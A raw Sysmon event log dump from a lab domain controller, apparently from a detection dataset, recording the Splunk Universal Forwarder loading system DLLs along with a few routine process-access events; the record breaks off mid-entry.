WindowsValid 734700x8000000000000000100538Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.907{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000100537Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.907{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000100536Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.907{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000100535Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000100534Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000100533Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000100532Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000100531Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000100530Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100529Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100528Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100527Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000100526Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x8000000000000000100525Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000100524Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000100523Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000100522Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x8000000000000000100521Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000100520Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000100519Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000100518Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100517Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000100516Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000100515Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000100514Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000100513Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100512Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100511Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000100510Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000100509Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\fltLib.dll10.0.14393.0 (rs1_release.160715-1616)Filter LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationfilterLib.dllMD5=051ABD8360BDA63A1BC77C662FBF0A25,SHA256=C914E2DBAEC2C9A11923A984B30A979637D3A27B3C29E93F4C90FB1D9FBC518F,IMPHASH=74D3C2DA8B6F9861866B866AE40683D3trueMicrosoft WindowsValid 734700x8000000000000000100508Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x8000000000000000100507Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100506Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000100505Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x8000000000000000100504Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100503Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exeMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02DtrueSplunk, Inc.Valid 10341000x8000000000000000100502Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100501Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100500Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100499Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100498Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-A252-6294-0500-000000005502}416532C:\Windows\system32\csrss.exe{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100497Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C165-6294-470B-000000005502}2040C:\Program 